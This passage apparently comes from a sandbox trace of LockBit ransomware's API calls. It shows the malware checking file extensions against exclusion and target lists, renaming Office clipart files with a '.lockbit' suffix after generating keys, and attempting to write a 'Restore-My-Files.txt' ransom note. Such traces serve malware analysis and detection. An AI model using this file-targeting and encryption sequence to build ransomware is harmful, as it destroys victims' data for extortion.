Office\\CLIPART\\PUB60COR\\TN01165_.WMF") returned=".WMF" [0179.480] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.480] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.480] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.481] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.481] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.481] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.481] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.481] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.481] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01165_.WMF.lockbit") returned 72 [0179.481] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01165_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn01165_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0179.481] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.482] malloc (_Size=0x40068) returned 0x3e70008 [0179.482] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1642) returned 1 [0179.482] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.482] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0179.482] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.482] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0179.483] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0179.488] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01165_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01165_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.488] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.488] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.498] free (_Block=0x1fa2ed8) [0179.498] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01165_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.498] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.498] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.499] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d5216d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4e02, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN01308_.WMF", cAlternateFileName="")) returned 1 [0179.499] lstrcmpiW (lpString1=".", lpString2="TN01308_.WMF") returned -1 [0179.499] lstrcmpiW (lpString1="..", lpString2="TN01308_.WMF") returned -1 [0179.499] PathFindExtensionW (pszPath="TN01308_.WMF") returned=".WMF" [0179.499] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.499] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.500] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.500] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN01308_.WMF") returned -1 [0179.501] lstrcmpiW (lpString1="ntldr", lpString2="TN01308_.WMF") returned -1 [0179.501] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN01308_.WMF") returned -1 [0179.501] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN01308_.WMF") returned -1 [0179.501] lstrcmpiW (lpString1="autorun.inf", lpString2="TN01308_.WMF") returned -1 [0179.501] lstrcmpiW (lpString1="thumbs.db", lpString2="TN01308_.WMF") returned -1 [0179.501] lstrcmpiW (lpString1="iconcache.db", lpString2="TN01308_.WMF") returned -1 [0179.501] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.501] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01308_.WMF") returned=".WMF" [0179.501] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.501] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.501] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.502] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.502] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01308_.WMF.lockbit") returned 72 [0179.502] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01308_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn01308_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.507] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.507] malloc (_Size=0x40068) returned 0x1ff1e60 [0179.507] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=19970) returned 1 [0179.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.507] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0179.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0179.508] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.510] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01308_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01308_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.510] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.510] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.511] free (_Block=0x1fa2ed8) [0179.511] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01308_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.511] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.511] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.512] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56eeac00, ftCreationTime.dwHighDateTime=0x1bf1119, ftLastAccessTime.dwLowDateTime=0x5ae8f450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56eeac00, ftLastWriteTime.dwHighDateTime=0x1bf1119, nFileSizeHigh=0x0, nFileSizeLow=0x276a, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00006_.WMF", cAlternateFileName="")) returned 1 [0179.512] lstrcmpiW (lpString1=".", lpString2="TR00006_.WMF") returned -1 [0179.512] lstrcmpiW (lpString1="..", lpString2="TR00006_.WMF") returned -1 [0179.512] PathFindExtensionW (pszPath="TR00006_.WMF") returned=".WMF" [0179.512] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.512] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.513] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.513] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TR00006_.WMF") returned -1 [0179.514] lstrcmpiW (lpString1="ntldr", lpString2="TR00006_.WMF") returned -1 [0179.514] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TR00006_.WMF") returned -1 [0179.514] lstrcmpiW (lpString1="bootsect.bak", lpString2="TR00006_.WMF") returned -1 [0179.514] lstrcmpiW (lpString1="autorun.inf", lpString2="TR00006_.WMF") returned -1 [0179.514] lstrcmpiW (lpString1="thumbs.db", lpString2="TR00006_.WMF") returned -1 [0179.514] lstrcmpiW (lpString1="iconcache.db", lpString2="TR00006_.WMF") returned -1 [0179.514] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.514] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00006_.WMF") returned=".WMF" [0179.514] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.514] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.514] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.515] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.515] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00006_.WMF.lockbit") returned 72 [0179.515] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00006_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0179.519] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.519] malloc (_Size=0x40068) returned 0x3d70450 [0179.519] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=10090) returned 1 [0179.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0179.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0179.520] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0179.522] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00006_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00006_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.522] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.522] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.524] free (_Block=0x1fa2ed8) [0179.524] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00006_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.524] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.524] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.524] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6f3e600, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x5ae8f450, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6f3e600, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x228c, dwReserved0=0x0, dwReserved1=0x0, cFileName="TR00095_.WMF", cAlternateFileName="")) returned 1 [0179.524] lstrcmpiW (lpString1=".", lpString2="TR00095_.WMF") returned -1 [0179.524] lstrcmpiW (lpString1="..", lpString2="TR00095_.WMF") returned -1 [0179.524] PathFindExtensionW (pszPath="TR00095_.WMF") returned=".WMF" [0179.524] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.524] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.524] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.525] lstrcmpiW (lpString1=".ani", 